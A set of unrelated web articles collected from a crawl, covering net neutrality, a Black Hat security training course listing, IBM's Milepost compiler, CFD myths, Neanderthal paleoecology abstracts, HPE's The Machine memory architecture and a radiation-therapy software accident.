payments to CBS for content. Time Warner Cable went nuclear and blacked out CBS broadcasts to its subscribers for weeks until the disagreement was settled. Now, with Net neutrality struck down, an ISP could do the same thing to a website, blocking access to all Google services unless Google paid what the ISP wanted, for example. What will be the likely result of all this? A balkanized Internet that bears no resemblance to the freewheeling network that has revolutionized the way people live, work and communicate, while fueling massive economic growth. But the FCC can do something about the ruling, and should. The court didn't give Verizon everything it wanted -- the court said that the FCC did, in fact, have the authority to regulate broadband traffic, even though it had exceeded its authority with the Open Internet Order. As a first step, the FCC should appeal the decision. But that's not enough, because another judge may well rule that the FCC exceeded its authority. The FCC should also come up with a set of Net neutrality regulations that don't depend upon common carrier precedents, and therefore might pass court muster. Even better would be the FCC reclassifying broadband as a telecommunications service that must follow common carrier rules. That would re-establish full Net neutrality. It's what should have been done back in 2002. Doing that would infuriate congressional Republicans and unleash the ISPs' lobbyists and political might in an all-out war against the FCC. Scott Cleland, who runs NetCompetition.org, which represents broadband carrier interests, made it clear that that's exactly what would happen. Computerworld quotes him as saying, "It would be regulatory World War III." But if that's what it takes, that's what needs to be done. Doing anything less would amount to an abdication of the FCC's responsibility and allow the Internet as we know it to die a slow death. Read more about internet in Computerworld's Internet Topic Center.
<urn:uuid:6f3d24d5-1ac2-461a-b062-55432903d174>
CC-MAIN-2017-04
http://www.computerworld.com.au/article/536077/preston_gralla_there_time_fix_net_neutrality/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279650.31/warc/CC-MAIN-20170116095119-00524-ip-10-171-10-70.ec2.internal.warc.gz
en
0.970054
1,265
2.921875
3
Beyond the Script: Practical Problem Solving Techniques for the Security Professional Problem solving and non-linear thinking are critical skills in the network security profession. These skills are hard learned, and often even more difficult to practice. This course will provide you with an opportunity to carry out a variety of attacks on a controlled system. You will solve problems through a collection of hands-on "capture-the-flag" scenarios with built-in challenges designed to test and expand your thought process. You will learn how to tackle these challenges from a practical problem-solving standpoint. Along the way we will discuss real life scenarios and dissect the thought processes required to achieve success in even the most daunting situations. Students will walk away with over $200 worth of tools utilized during the course. From the start of the course, a set of challenges will be available for the students to participate in and solve. The practical application portion of this course will provide students with time to work on these challenges with the help of the instructors. These challenges will be in the form of a multistage challenge box that will require students to leverage the techniques and skills learned over the previous day. This could include physical locks, RFID replays gathered from around the conference, SCADA/ICS devices to hack and manipulate, etc. Challenges will be diverse and designed to stretch students to work together to leverage each others strengths in order to be successful. In this course you will: - Practice or learn basic penetration testing skills. - Perform network enumeration and attack. - Capture and Replay RFID tag information. - Analyze wireless signals using software defined radios. - Circumvent Physical Access Controls. - Solve complex problems both individually and as part of a team. - Assessing Networks for vulnerabilities and exploitation. - Web application testing. - ICS assessment and exploitation. - Radio Frequency Identification - Sniff, Clone and Replay. - A fun and interesting homework assignment. - Basic lock picking techniques. - Physical Access Control Systems, getting into where you aren't supposed to be. - Wireless penetraion testing. - Software Defined Radio - Pulling information from thin air. - Practical application of what you have learned. Who Should Take this Course This course is designed for system defenders, system and network administrators, red teamers and penetration testers. Experience with system administration, penetration testing tools, and defensive measures will be helpful, but not required. A willingness to learn new ways of thinking, solving problems and working in a team. What Students Should Bring - Students must have a laptop with administrator access capable of running virtual machines. - RJ-45 port or Wired Network Adaptor. - Standard open USB port for use during course. What Students Will Be Provided With - RTL-SDR with Antenna - Sparrows Mace Picks - Flash drive with course materials and other tools - Practice locks - Demo networks - Custom Control System Jeremy "CrYpT" Dodson has been involved in Information Technology for over 20 years, with a focus in Information Security for 18 years. He is a United States Air Force Veteran who has served in support of the National Security Agency, Defense Information Systems Agency, European Command Air Force, Department of Energy and Department of Labor. He has also consulted with HP, DELL, and various other Fortune 500 IT companies. Jeremy has presented at and assisted in conference organization for several INFOSEC conferences in the US. He is a Co-Founder of Curious Codes along with Ryan Clarke, Casey Clarke, and Jay Korpi. Curious Codes is an organization designed to teach cryptography and cryptanalysis through community based events. The mission behind Curious Codes is to promote curiosity and creative thought process through fun and engaging casual crypto experiences. Ryan "1o57" Clarke self-identifies as a hacker. Currently working as a consultant for the Department of Energy, Mr. Clarke has formerly held positions with multiple three letter agencies both in and out of the Department of Defense. Mr. Clarke is also a former member of the Advanced Programs Group at Intel, and the Professor of Robotics and Embedded Systems at the University of Advancing Technology. Mr. Clarke has consulted for the Department of Energy, the Department of the Interior, several Fortune 50 companies, and multiple domestic and international organizations. Mr. Clarke is also the official cryptographer and puzzle master for the DEF CON security conference, and is one of the conference organizers. For DEF CON Mr. Clarke created the Hardware Hacking Village, the LosT@Defcon Mystery Challenge, the conference badges, and other events and activities which include aspects of network intrusion and security, social engineering, RED and BLUE team testing, mathematics, linguistics, physical security, and various other security and hacker related skillsets. For his work with DEF CON Mr. Clarke has been featured by Wired, Forbes, the Register, CNET, and various other media outlets. Mr. Clarke's academic background and multiple degrees include include computational mathematics, linguistics, cryptography, electrical engineering, computer systems engineering. Mike "Anch" Guthrie currently works on a Red Team for an agency with a 3 letter acronym. It's not secret squirrel, or hush hush he just doesn't like to talk about himself very much. He has 15 years of experience in penetration testing and cyber security with a background in control systems and security architecture.
<urn:uuid:cd37ca47-1b8e-4e63-a912-b103fb2cf991>
CC-MAIN-2017-04
https://www.blackhat.com/asia-17/training/beyond-the-script-practical-problem-solving-techniques-for-the-security-professional.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284411.66/warc/CC-MAIN-20170116095124-00550-ip-10-171-10-70.ec2.internal.warc.gz
en
0.929523
1,110
2.8125
3
IBM announces the public availability of Milepost GCC, an open-source machine learning compiler that IBM says allows applications to be developed, tested and optimized 10 times faster than current tools. announced June 3 the public availability of Milepost GCC, a first-of-its-kind open-source machine learning compiler. The Milepost GCC compiler "intelligently optimizes applications, translating directly into shorter software development times and bigger performance gains," IBM officials said in a news release. IBM's Research Lab in Haifa, Israel, worked with academia and private industry in the European Union to polish the new compiler, which, unlike commercially available compilers, employs artificial intelligence to tweak individual pieces of code. With the compiler, applications can be developed, tested and optimized 10 times faster than current tools, according to IBM. Moreover, performance of the software programs can be improved by an average of 18 percent, IBM officials said. These improvements are significant, given that the average company "devotes 30 to 50 percent of its entire technology infrastructure to the development and testing of software," according to IBM. IBM reported that it experienced the 18 percent performance improvement on embedded-application benchmarks conducted on IBM System p servers. The new compiler is a result of collaboration between IBM and its partners in the European Union-funded Milepost consortium. IBM officials said the compiler is expected to "reduce time-to-market for new software designs. ... For example, when a company wants to develop a new mobile phone, it normally takes application developers many months to get their software running at an acceptable level of performance. Milepost GCC can reduce the amount of time it takes to reach that level by a factor of 10." "Our technology automatically learns how to get the best performance from the hardware-whether mobile phones, desktops or entire systems, the software will run faster and use less energy," Bilha Mendelson, manager of code optimization technologies at IBM Research Haifa, said in the release. "We opened the compiler environment so it can access artificial intelligence and machine learning guidance to automatically determine exactly what specific optimizations should be used and when to apply them to ramp up performance." "We've developed a more cost-effective development process where you can choose to integrate additional functionality or use less power in your current system," Milepost Project Coordinator Mike O'Boyle, professor of computer science at the University of Edinburgh's School of Informatics, said in the release. "Previously, the same devices could only support a limited list of features while still maintaining a high level of performance. Significantly boosting an application's performance means there's now more room for added functionality while maintaining high performance." According to the release: As a by-product of the Milepost technology, the consortium has launched a code-tuning web site available to the development community. Developers can upload their software code to the site and automatically get input on how to tune their code so it The Milepost GCC compiler is available to everyone as of June 25 from the consortium's website http://www.milepost.eu. The project consortium includes the IBM Haifa Research Lab, Israel; the University of Edinburgh, UK; ARC International Ltd., UK; CAPS Enterprise, France; and INRIA, France.
<urn:uuid:bbff49c8-33d6-4a6e-bc4c-c73d6bf0528b>
CC-MAIN-2017-04
http://www.eweek.com/c/a/Application-Development/IBM-Delivers-Smart-OpenSource-Compiler-695460
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279915.8/warc/CC-MAIN-20170116095119-00368-ip-10-171-10-70.ec2.internal.warc.gz
en
0.89431
722
2.53125
3
Computational fluid dynamics (CFD) is a sophisticated computer modeling technique that allows engineers to simulate the flow of gases and liquids, and predict fluid-structure interaction. CFD provides deeper insights into the design, allowing the user to assess what will happen under a given set of circumstances. Being able to work out kinks and flaws prior to prototyping and physical testing is an obvious benefit, yet many feel that CFD is either too slow, too complex or too expensive for mainstream design use. According to a recent article at Design World, those objections are outdated and need to be re-examined. In order to set the record straight, Dr. Ivo Weinhold, product marketing manager at Mentor Graphics, Mechanical Analysis Division, presents “The five myths of CFD.” Dr. Weinhold explains that these “myths are standing in the way of greater use in the early phases of mechanical design [and] help explain why only about 30,000 out of over 1 million mechanical design engineers worldwide use CFD to simulate fluid flow inside and around their products.” He maintains that while these myths may have held merit 10 years ago, times have changed, and CFD has become more user-friendly, quicker, and easier on the pocket-book. Here is a quick rundown on the big five: Myth #1: CFD is too difficult to be used in the design process Myth #2: CFD takes too long to use during the design process Myth #3: CFD is too expensive to be used by mechanical engineers Myth #4: You can’t directly use your CAD model to do CFD analysis Myth #5: Most products don’t need CFD analysis This is a must-read article for all you design engineers out there or anyone related to the industry.
<urn:uuid:7fac5dea-9403-49ad-b069-c3f0675a11b6>
CC-MAIN-2017-04
https://www.hpcwire.com/2010/10/13/not_your_parents_cfd/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00000-ip-10-171-10-70.ec2.internal.warc.gz
en
0.945035
380
3.1875
3
The cable industry is set to help warn Americans about the H1N1 virus, better known as the swine flu, with the National Cable & Telecommunications Association distributing government public service announcements (PSAs) and NCTA members pledging to air the spots. The cable industry is working to assist the U.S. Department of Health and Human Services (HHS) increase awareness and promote the prevention of the swine flu. While the swine flu is not as big a threat as the avian flu, which HHS describes as “lethal,” it can produce more severe illnesses than the typical flu. According to HHS: “This year, the H1N1 (swine) flu virus may cause a more dangerous flu season with a lot more people getting sick, being hospitalized and dying than during a regular flu season. H1N1 (swine flu) is a new virus first seen in the United States. It is contagious and spreads from person to person. Like seasonal flu, illness in people with H1N1 can vary from mild to severe.” “The upcoming flu season, and the prospect of additional widespread outbreaks of the H1N1 virus, could become disruptive to the everyday lives, health and welfare of millions of Americans,” noted Kyle McSlarrow, president and CEO of the NCTA. “With cable’s ability – through thousands of local cable systems and scores of ad-supported cable networks – to reach the vast majority of American households, we think it’s critical to add our resources to the government’s efforts to help all Americans avoid the flu and other infectious diseases.” A satellite feed will be available on Oct. 13 from 2-2:30 p.m. EST for cable operators and programmers to “downlink” the PSAs. Information on satellite coordinates and other ways of obtaining the PSAs is available from the NCTA’s Communications & Public Affairs Department by contacting Helen Dimsdale at email@example.com or Allison Shelton at firstname.lastname@example.org , or by calling (202) 222-2350. |More Broadband Direct 10/09/09:| |• Comcast serves notice on bots, viruses with new program | |• Bill to curb loud ads moves thru Congress | |• Cable a bastion against the aporkalypse | |• De la Vega talks spectrum, competition, handsets | |• FCC signals new rules on wireless broadband | |• Tech industry braces for more antitrust scrutiny | |• Report: OTT eating into video market share pie | |• Broadband Briefs for 10/09/09 |
<urn:uuid:44fa7eea-618f-4d93-bae0-e525b528b8e7>
CC-MAIN-2017-04
https://www.cedmagazine.com/print/news/2009/10/cable-a-bastion-against-the-aporkalypse
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279933.49/warc/CC-MAIN-20170116095119-00213-ip-10-171-10-70.ec2.internal.warc.gz
en
0.928708
568
2.546875
3
Fiorenza L.,University of New England of Australia | Benazzi S.,University of Bologna | Benazzi S.,Max Planck Institute for Evolutionary Anthropology | Henry A.G.,Max Planck Institute for Evolutionary Anthropology | And 8 more authors. American Journal of Physical Anthropology | Year: 2015 Neanderthals have been commonly depicted as top predators who met their nutritional needs by focusing entirely on meat. This information mostly derives from faunal assemblage analyses and stable isotope studies: methods that tend to underestimate plant consumption and overestimate the intake of animal proteins. Several studies in fact demonstrate that there is a physiological limit to the amount of animal proteins that can be consumed: exceeding these values causes protein toxicity that can be particularly dangerous to pregnant women and newborns. Consequently, to avoid food poisoning from meat-based diets, Neanderthals must have incorporated alternative food sources in their daily diets, including plant materials as well. © 2014 American Association of Physical Anthropologists. Source Rodriguez-Gomez G.,National Research Center sobre la Evolucion Humana | Mateos A.,National Research Center sobre la Evolucion Humana | Martin-Gonzalez J.A.,University of Burgos | Blasco R.,Gibraltar Museum | And 3 more authors. PLoS ONE | Year: 2014 Increasing evidence suggests that the European human settlement is older than 1.2 Ma. However, there is a fierce debate about the continuity or discontinuity of the early human settlement of Europe. In particular, evidence of human presence in the interval 0.7-0.5 Ma is scarce in comparison with evidence for the previous and later periods. Here, we present a case study in which the environmental conditions at Sierra de Atapuerca in the early Middle Pleistocene, a period without evidence of human presence, are compared with the conditions in the previous period, for which a relatively intense human occupation is documented. With this objective in mind, the available resources for a human population and the intensity of competition between secondary consumers during the two periods are compared using a mathematical model. The Gran Dolina site TD8 level, dated to 0.7-0.6 Ma, is taken as representative of the period during which Atapuerca was apparently not occupied by humans. Conditions at TD8 are compared with those of the previous period, represented by the TD6-2 level, which has yielded abundant evidence of intense human occupation. The results show that survival opportunities for a hypothetical human population were lower at TD8 than they were at TD6-2. Increased resource competition between secondary consumers arises as a possible explanation for the absence of human occupation at Atapuerca in the early Middle Pleistocene. © 2014 Rodríguez-Gómez et al. Source Rodriguez-Vidal J.,University of Huelva | Finlayson G.,Gibraltar Museum | Finlayson C.,Gibraltar Museum | Finlayson C.,University of Toronto | And 4 more authors. Geomorphology | Year: 2013 The Rock of Gibraltar, at the south-western extreme of the Iberian Peninsula and 21. km from the North African coast, is a 6-km long limestone peninsula which was inhabited by Neanderthals from MIS 5e until the end of MIS 3. A total of 8 sites, either with Neanderthal fossils or their Mousterian lithic technology, have been discovered on the Rock. Two, Gorham's and Vanguard Caves, are the subject of ongoing research. These caves are currently at sea level, but during MIS 3 faced an emerged coastal shelf with the shoreline as far as 5. km away at times. They hold a unique archive of fauna and flora, in the form of fossils, charcoal and pollen, helping environmental reconstruction of now-submerged shelf landscapes. In addition, geological and geomorphological features - a 300-metre dune complex, elevated aeolian deposits, raised beaches, scree, speleothems - complement the biotic picture.The work is further complemented by a study of the ecology of the species recorded at the site, using present-day observations. The species composition in this fossil record closely matches the present day fauna and vegetation of the Doñana National Park, SW Spain: a mosaic of pine groves, coastal dunes, shrubland and seasonal wetlands and currently the richest reserve in terms of biodiversity in the Iberian Peninsula, located only 100. km to the northwest from Gibraltar.All this information permits, for the first time, the quantification of the vegetation structure of the ancient coastal plain and the modelling of the spatio-temporal dynamics of the MIS 3 coastal shelf off Gibraltar. © 2013 Elsevier B.V. Source Blain H.-A.,Institute Catala Of Paleoecologia Humana I Evolucio Social | Blain H.-A.,Rovira i Virgili University | Gleed-Owen C.P.,CGO Ecology Ltd | Lopez-Garcia J.M.,Institute Catala Of Paleoecologia Humana I Evolucio Social | And 7 more authors. Journal of Human Evolution | Year: 2013 Gorham's Cave is located in the British territory of Gibraltar in the southernmost end of the Iberian Peninsula. Recent excavations, which began in 1997, have exposed an 18 m archaeological sequence that covered the last evidence of Neanderthal occupation and the first evidence of modern human occupation in the cave. By applying the Mutual Climatic Range method on the amphibian and reptile assemblages, we propose here new quantitative data on the terrestrial climatic conditions throughout the latest Pleistocene sequence of Gorham's Cave. In comparison with current climatic data, all mean annual temperatures were about 1.6-1.8 °C lower in this region. Winters were colder and summers were similar to today. Mean annual precipitation was slightly lower, but according to the Aridity Index of Gaussen there were only four dry months during the latest Pleistocene as opposed to five dry months today during the summer. The climate was Mediterranean and semi-arid (according to the Aridity Index of Dantin-Revenga) or semi-humid (according to the Aridity Index of Martonne). The atmospheric temperature range was higher during the latest Pleistocene, mainly due to lower winter temperatures. Such data support recent bioclimatic models, which indicate that high rainfall levels may have been a significant factor in the late survival of Neanderthal populations in southern Iberia. The Solutrean levels of Gorham's Cave and climate records from cores in the Alboran Sea indicate increasing aridity from Marine Isotope Stage (MIS) 3-2. Because Neanderthals seem to have been associated with woodland habitats, we propose that lessening rainfall may have caused the degradation of large areas of forest and may have made late surviving Neanderthal populations more vulnerable outside southern refuges like the Rock of Gibraltar. © 2013 Elsevier Ltd. Source Lopez-Garcia J.M.,Rovira i Virgili University | Cuenca-Bescos G.,University of Zaragoza | Finlayson C.,The Gibraltar Museum | Finlayson C.,University of Toronto | And 2 more authors. Quaternary International | Year: 2011 Gorham's cave is located in the British territory of Gibraltar in the southernmost end of the Iberian Peninsula. The cave was discovered in 1907 and first excavated in the 1950s by John Waechter of the Institute of Archaeology in London. New excavations, which started in 1997, have exposed 18 m of human occupation in the cave, spanning the Late Pleistocene, as well as including brief Phoenician, Carthaginian and Neolithic occupations. The Late Pleistocene levels consist of two Upper Palaeolithic occupations, attributed to the Solutrean and Magdalenian technocomplexes (Level III), and which are dated, by AMS radiocarbon, to between 18,000 and 10,000 years ago. The underlying Mousterian layer (Level IV), dated by AMS radiocarbon to between 23,000 and 33,000 years ago, is separated from Level III by an archaeologically sterile layer, which spans some 4000 years.This paper presents previously unpublished palaeoenvironmental and paleoclimatic reconstructions of Gorham's cave, during these Pleistocene occupations, using the small mammal assemblage. The small mammal assemblage at Gorham's cave comprises of at least 12 species: 4 insectivores (Crocidura russula, Sorex gr. coronatus-araneus, Sorex minutus and Talpa occidentalis); 3 chiropters (Myotis myotis, Myotis nattereri and Miniopterus schreibersii); and 5 rodents (Microtus (Iberomys) cabrerae, Microtus (Terricola) duodecimcostatus, Arvicola sapidus, Apodemus sylvaticus and Eliomys quercinus). The presence of these small mammal species indicates that the landscape surrounding the Rock of Gibraltar was predominantly an open habitat, with the presence of woodland and water stream meadows, as well as the presence of larger bodies of water. These results are then compared with pollen and charcoal analysis as well as other faunal proxies, such as the herpetofauna, bird and large mammal assemblages, providing an accurate reconstruction of the climatic and environmental conditions that prevailed during the Late Pleistocene in the southernmost of the Iberian Peninsula. © 2011 Elsevier Ltd and INQUA. Source
<urn:uuid:bcc78680-f967-45de-8edd-c4c5b0bdbff3>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/gibraltar-museum-780916/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280929.91/warc/CC-MAIN-20170116095120-00515-ip-10-171-10-70.ec2.internal.warc.gz
en
0.916455
2,060
3.6875
4
The current generation of microprocessors are ill-equipped to meet growing demands of data processing. Stated another way, the amount of data that needs to be processed is quickly outpacing the performance of chips. With the current processor-centric design, the data is shuttled back and forth from processor to memory, a time-consuming activity. Additionally, all that back-and-forth movement requires a lot of electrity, far more than is consumed by the actual processing. Employing the current processor design in future exascale supercomputers (machines that will require about a billion cores) will create an impossible energy demand. If computing progress is to continue its foward march and if the next big goal of exaflop-scale machines is to be achieved, it will require a revamping of the current processor architecture. And thanks to advancements in the field of nanoelectronics, the time for such a redesign may finally be at hand. New York Times author John Markoff explores the issue in a recent article. The semiconductor industry has long warned about a set of impending bottlenecks described as “the wall,” a point in time where more than five decades of progress in continuously shrinking the size of transistors used in computation will end. If progress stops it will not only slow the rate of consumer electronics innovation, but also end the exponential increase in the speed of the world’s most powerful supercomputers — 1,000 times faster each decade. Researchers from industry and academia alike have begun to address the challenge, as Markoff notes. Hewlett-Packard researchers are designing stacked chip systems that bring the memory and processor much closer together, reducing the distance the data must travel and in doing so greatly reducing energy demands. Parthasarathy Ranganathan, a Hewlett-Packard electrical engineer, explains that the “systems will be based on memory chips he calls ‘nanostores’ as distinct from today’s microprocessors. They will be hybrids, three-dimensional systems in which lower-level circuits will be based on a nanoelectronic technology called the memristor, which Hewlett-Packard is developing to store data. The nanostore chips will have a multistory design, and computing circuits made with conventional silicon will sit directly on top of the memory to process the data, with minimal energy costs.” The science of nanoelectrics has generated other promising technologies designed to make the energy demands of future systems more manageable. Researchers at Harvard and Mitre Corporation have developed nanoprocessor “tiles” based on electronic switches made from ultrathin germanium-silicon wires. I.B.M. and Samsung have partnered on phase-change memories, in which an electric current is used to switch a material from a crystalline to an amorphous state and back again. I.B.M. researchers are also looking at carbon nanotube technology to create hybrid systems that draw on advancements in both nanoelectronics and microelectronics.
<urn:uuid:277698a6-6d41-4608-af98-06efac93b209>
CC-MAIN-2017-04
https://www.hpcwire.com/2011/02/28/growing_data_deluge_prompts_processor_redesign/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281424.85/warc/CC-MAIN-20170116095121-00423-ip-10-171-10-70.ec2.internal.warc.gz
en
0.914405
635
3.4375
3
The Bits And Bytes Of The Machine’s Storage January 25, 2016 Mark Funk By now, as we have seen in other parts of this series, we have a pretty good sense for the basic topology of The Machine from Hewlett Packard Enterprise. In it are massive amounts of fabric memory, any node and application can access it, no matter where they are executing. In there somewhere, though, is your file, your object, your database table. You know it’s yours and only you have the right to access it. So, what in The Machine is ensuring that only you get to access it? And, in doing so, still allow you efficient access to it. Folks designing The Machine speak absolutely correctly about the need to have integrated security and integrity throughout The Machine’s design. So let’s start by looking at one very low level aspect of that integrated security. As you have seen, every processor on any node can access the contents of any byte of fabric memory, no matter the node on which it resides. You have also seen that only local processors can access a node’s DRAM. You might also know that in more standard symmetric multi-processor systems, or SMPs, every byte of the physical memory is known by a unique real address. A program’s instructions executing on a processor generate such real addresses, using that real address to uniquely request the data found there, and then work with that data. Knowing that the DRAM is only locally accessible, you might picture that both the volatile and the Fabric Memory as being mapped under a Real Address Space as in the following figure: In such a mapping, any processor could generate a real address into local DRAM and that address would only access the memory from its own node, and no other. The hardware guarantees that merely from the notion of private/local memory. However, with fabric memory being global, the whole of the fabric memory would be spread out across the remainder of the real address space, allowing every byte found there to be accessed with a unique real address, no matter the processor using that real address. Yes, that would work, but that is not the mental picture to have for The Machine. Indeed, suppose it was, and any processor can have concurrent access to hundreds of petabytes of persistent memory. Just to keep it simple, let’s say The Machine’s fabric memory size someday becomes 256 pebibytes; that is 256 X 10245, or 28 * 250 bytes, requiring at least 58 bits to span this real address space. If a processor were to need to concurrently access all of this memory, the processor would need to be capable of supporting this full 58-bit address. For comparison, the Intel Xeon Phi supports a 40-bit physical address in 64-bit mode. It’s not that it can’t be done, but that is quite a jump. And from Keith Packard’s presentation we find that The Machine did not make that jump: “In our current implementation, we are using an ARM-64 core; a multi-core processor. It has 48 bits of virtual addressing, but it has only 44 bits of physical addressing. . . . Out of that, we get 53 bits (real address), and that can address 8 petabytes of memory. . . and we translate those into actual memory fabric addresses, which are 75 bits for an address space potential of 32 zettabytes.” Still, if such a huge global real address were supported, that means that if any processor can generate such a real address – which also means that if any thread in any process in any OS can generate such a real address – it then also has full access to the whole of The Machine’s memory at any moment. If this were the way that all programs actually access memory, system security and integrity would have a real problem. There are known ways – ways used on most systems and The Machine as well (as we’ll see in a subsequent article in this series) – that this can be avoided; done right, today’s systems tend to be quite secure. Even so, The Machine takes addressing-based security and integrity a step further even at this low level of real addresses as we will see next. In the real addressing model used by The Machine, rather than real address space being global (as in the above figure), picture instead a real address space per node, or more to the point, one scoped only to the processors of each node. Said differently, the processors of any given node have their own private real address space. Part of that is, of course, used to access the node-local DRAM. But now also picture regions of each node’s real address space as being mapped securely by the hardware onto windows of various sizes into fabric memory, any part of fabric memory. The processors of each node could potentially generate arbitrary real addresses within their own real address space, but it is only those real-address regions securely mapped by the hardware onto physical memory that can actually be accessed. No mapping, no access. Even though the node’s real address space may be smaller than the whole of fabric memory, those portions of fabric memory needed for concurrent access are nonetheless accessible. For example, a file manager on your node wants access to some file residing in fabric memory, perhaps a single file residing in – spread out amongst – a set of different regions on a number of different nodes. Your OS requests the right to access all of that file. Portions of the file are each known to reside physically on a particular set of nodes and, within those nodes, at particular regions within them. That fact alone does nothing for your program or the processor accessing it; the file is at well-defined locations in physical DRAM, but the processor proper can only generate real addresses. Said differently, the program and the processor could generate real addresses with the intent of accessing fabric memory, but that real address is not the physical tuple like Node ID::Media Controller ID::DIMM::Offset where the file’s bytes really reside. To actually allow the access, your node’s hardware must be capable of translating the processor’s real address into such a physical representation. That real-to-physical region mapping is held and set securely in the hardware; your program knows nothing about it, only trusted code and the hardware do. Your processor generates the real address of the file as your OS perceives it and the hardware supporting the fabric memory translates that real address to the actual location(s) of your file. Of course, persistent or not, the fabric memory is also just memory; slower, yes, but there a lot of it. Redrawing the previous figure slightly more abstractly as below (it’s still the same four nodes), we can see that if your program needs more memory, it can ask for more; upon doing so, your program is provided a real address – a real address as understood by your node’s processors – and that real address had been mapped onto some physical region of fabric memory (which can include the local node’s fabric memory). Additionally, the fabric memory may enable data persistence, but if it is only more “memory” that your program needs, your program need not manage it as persistent. As we saw earlier, blocks in fabric memory is cache-able, each block tagged in the cache using real addresses. Once such blocks are flushed from the cache, the real address is provided to this mapping hardware, which in turn identifies where in fabric memory the flushed block is to be stored. If your object did not need to actually be persistent, rather than explicitly forcing cached blocks out to memory, you can just allow such blocks to sooner or later be written back to even fabric memory. Your program need not know when or even if; as with DRAM, the changed data can sooner or later makes its way back to memory. Interestingly, as a different concept, even though every node shown here does have a processor (and its own DRAM), if one or more nodes are only contributing fabric memory to the system, while it is only the persistent memory of such nodes being used, the processors and DRAM on such nodes could conceivably be shutdown, saving the cost of keeping them powered. The Shared Versus Persistent Data Attributes Of Fabric Memory As implied in the previous section, the topology of The Machine introduces an interesting side effect, perhaps even an anomaly, showing the two sides of fabric memory. The volatile DRAM memory is accessible by only the processors residing on the same node, so any sharing possible is by only the processors on that node. That is as far as that sharing there goes. So if processor-based sharing is to occur amongst any of The Machine’s processors and OSes, it’s the non-volatile fabric memory that is being used for that purpose, not the volatile DRAM. Interestingly, for much of that sharing the data shared need not also require persistence. See the point? The Machine’s non-volatile fabric memory is being used for essentially two separate reasons; - For active data sharing, for data that does not need to be maintained as persistent, and - Separately, as memory which truly is persistent, and – interestingly – is likely being shared as a result. I did not actually say that the inter-node shared data does not need to be in fabric memory. It does. Inter-node sharing cannot count on cache coherence. In order for another node to see the data being shared, that shared data must be in fabric memory and invalidated from the cache of nodes that want to see the changes. Said differently, suppose processors of two nodes, Node A and B, want to share data. A processor on Node A has made the most recent change to the shared data, with the change residing still in the cache of that processor. If cache coherence spanned multiple nodes, a processor on Node B would be capable of seeing that changed data, even if still in Node A’s processor’s cache. But cache coherence does not span nodal boundaries. So if Node A’s processor wants to make the change visible to the processors on Node B, Node A’s processor must flush the changed cache lines back out to fabric memory. Additionally, in order for a processor on Node B to see this same data, that data block cannot then reside in a Node B processor’s cache; if it does, that block (unchanged) must also be flushed from that cache to allow a Node B processor to see the change. Seems complex, and it is important to enable inter-node sharing of changing data, but The Machine provides APIs to enable such sharing. So, yes, we did need to make the shared data reside in fabric memory in order to allow it to be seen by another node, but we did not actually need it to be persistent. That item of data is in persistent fabric memory in order for it to be available to be seen by Node B and others, but actual persistence to failure is a bit more subtle than that. If after successfully flushing the changed cache lines to fabric memory holds the changed/shared data, it will still be there after power cycling, but does there exist enough information for the restarted system to find the changed data? It’s that which we’ll try to explain in the next section.
<urn:uuid:9f4febed-7a4b-4958-ad94-5b8a820409dc>
CC-MAIN-2017-04
https://www.nextplatform.com/2016/01/25/the-bits-and-bytes-of-the-machines-storage/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279189.36/warc/CC-MAIN-20170116095119-00149-ip-10-171-10-70.ec2.internal.warc.gz
en
0.945244
2,372
2.953125
3
Medical Physicists Role Perhaps nothing shows the ravages of faulty calculations as clearly as cancer. The patients who were suffering in Panama had cancers of the pelvis. Pelvic organs such as the intestines and kidneys are acutely sensitive to radiation. Before a cancer patient such as Garcia is exposed to radiation, a doctor devises a treatment plan that determines what dose of radiation can safely be directed at the tumor. The physician considers the tumors position and depth in the body, the likelihood that the cancer has spread to surrounding tissue, the location and sensitivity of nearby organs and the best angles of attack.The doctor hands his plan to a medical physicist, who feeds information on the size, shape and location of the blocks into a software package. These packages generally create a 3-D picture of how the dose will be distributed, showing how the radiation will "sum" as beams coming in from different angles intersect at depth in the patients tissue. Once the doctor prescribes a dosage, the software calculates the duration of treatment. The physicists in Panama were carrying out a doctors instruction to be more protective, adding a fifth block to the four the hospital often used on patients in cancer treatments. The extra block could help protect patients whose tissues were especially sensitive due to previous surgeries or radiation treatments. Multidatas planning software was designed to calculate treatments when there were four or fewer blocks, according to the companys general business manager, Mick Conley. Saldaña, however, read Multidatas manual and concluded she could make the software account for a fifth block. According to an August 2001 report from the IAEA, Saldaña found the software didnt only work if she entered the dimensions of each block individually, up to four. She found it also allowed her to enter the dimensions of all five blocks as a single, composite shape-for instance, a rectangle with one triangular block sitting in each corner and a fifth square block protruding, tooth-like, down into the rectangle from the top. Want the story latest news in programming environments and developer tools? Check out eWEEKs Developer Center at http://developer.eweek.com So, using the mouse attached to her computer, she entered on the screen the coordinates of the specially shaped block— first the inner perimeter of the shape and then the outer perimeter. This is when she felt she was "home free." After all, when Saldaña entered the data for this unusual-looking block, the system produced a diagram that appeared to confirm its dimensions. She seemed to be getting confirmation from the system itself that her approach was acceptable. Next Page: Ravages of miscalculation. As part of the plan, the doctor figures out how to place metal shields, known as "blocks," above the area where the tumor is located. These blocks, usually made of lead or a metal alloy called cerrobend, protect normal or sensitive tissue from the gamma rays to come.
<urn:uuid:b18c6a67-6a11-42df-a35b-135a5edfe8e7>
CC-MAIN-2017-04
http://www.eweek.com/c/a/Web-Services-Web-20-and-SOA/Can-Software-Kill/4
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280410.21/warc/CC-MAIN-20170116095120-00543-ip-10-171-10-70.ec2.internal.warc.gz
en
0.962582
597
2.96875
3
